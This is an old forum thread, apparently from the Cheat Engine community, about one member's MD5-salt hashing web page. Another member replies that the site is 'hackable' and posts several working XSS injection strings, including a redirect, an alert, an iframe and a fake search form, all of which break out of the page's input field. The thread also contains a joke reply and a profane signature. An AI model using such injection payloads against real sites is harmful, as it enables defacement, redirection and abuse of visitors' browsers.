| View previous topic :: View next topic |
| Author |
Message |
Lyfa The Lonely Man
Reputation: 12
Joined: 02 Nov 2008 Posts: 743
|
Posted: Tue May 04, 2010 7:47 pm Post subject: Need suggestions for script |
|
|
It was a script for one of Aviar's projects. If you have any updates, do tell:
http://quinnheagy.org/md5-saltv3.php
_________________
|
|
| Back to top |
|
 |
1929394839292057839194958 Grandmaster Cheater Supreme
Reputation: 130
Joined: 22 Dec 2006 Posts: 1509
|
Posted: Tue May 04, 2010 8:09 pm Post subject: |
|
|
| | Original String:" konr "| MD5: 578cc46bcbe5c297fde6ed5a39b3dae9| Salt: 130ef1747d47b47326f017e19318747e| Time: 0.000558137893677 seconds.
|
|
| Back to top |
|
 |
Fafaffy Cheater
Reputation: 65
Joined: 12 Dec 2007 Posts: 28
|
Posted: Tue May 04, 2010 11:08 pm Post subject: |
|
|
Fear, your site is really hackable...
| Code: | | "/><html><meta http-equiv="REFRESH" content="0;url=http://www.google.com"></html> |
or
| Code: | | "/><html><MARQUEE LOOP=2>XSS'ed</MARQUEE></html> |
or
| Code: | | "/><html><script language="javascript" type="text/javascript">alert("XSS'ed")</script></html> |
or
| Code: | | "/><html><iframe src ="http://www.google.com/search?q=XSS%27ed&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a" width="100%" height="300"><p>Your browser does not support Google.</p></iframe></html> |
More coming soon...
_________________
| Brillia wrote: | | I FUCKING FUCK SEX |
|
|
| Back to top |
|
 |
Simon :v Grandmaster Cheater
Reputation: 38
Joined: 11 Oct 2006 Posts: 708
|
Posted: Tue May 04, 2010 11:24 pm Post subject: |
|
|
Here, I did a script for you.
| Quote: |
Scene One:
Narrator:
Suigintou
Actors:
F3ar
Konr
blablfy
Narrator: One day, on the CheatEngine forums, User 'F3ar' posts a plea for help.
F3ar: "Need suggestions for script. It was a script for one of Aviar's projects. If you have any updates, do tell."
F3ar issues a link to his website: http://quinnheagy.org/md5-saltv3.php
Konr: " | Original String:" konr "| MD5: 578cc46bcbe5c297fde6ed5a39b3dae9| Salt: 130ef1747d47b47326f017e19318747e| Time: 0.000558137893677 seconds. "
blablfy: "Fear, your site is really hackable... "
blablfy offers snippets of code to help F3ar. |
|
|
| Back to top |
|
 |
Fafaffy Cheater
Reputation: 65
Joined: 12 Dec 2007 Posts: 28
|
Posted: Tue May 04, 2010 11:48 pm Post subject: |
|
|
Fixed one of my codes, and added two codes...
Just show a message box.
| Code: | "/><html><script language="javascript" type="text/javascript">alert("XSS'ed")</script></html>
<script type="text/javascript">
window.stop()</script> |
Timer
| Code: | "/><html>
<head>
<script type="text/javascript">
var c=0;
var t;
var timer_is_on=0;
function timedCount()
{
document.getElementById('txt').value=c;
c=c+1;
t=setTimeout("timedCount()",1000);
}
function doTimer()
{
if (!timer_is_on)
{
timer_is_on=1;
timedCount();
}
}
function stopCount()
{
clearTimeout(t);
timer_is_on=0;
}
</script>
</head>
<body>
<form>
<input type="button" value="Start count!" onclick="doTimer()" />
<input type="text" id="txt" />
<input type="button" value="Stop count!" onclick="stopCount()" />
</form>
<p>
Click on the "Start count!" button above to start the timer. The input field will count forever, starting at 0. Click on the "Stop count!" button to stop the counting. Click on the "Start count!" button to start the timer again.
</p>
</body>
</html>
<script type="text/javascript">
window.stop()</script> |
GOOGLE SEARCH!!!!
| Code: | | "/></form><form action="http://www.google.com/search" method="GET"><input type="text" name="q" value=""/> <input type="submit" value="Google Search" /></form><script type="text/javascript">window.stop()</script> |
_________________
| Brillia wrote: | | I FUCKING FUCK SEX |
|
|
| Back to top |
|
 |
|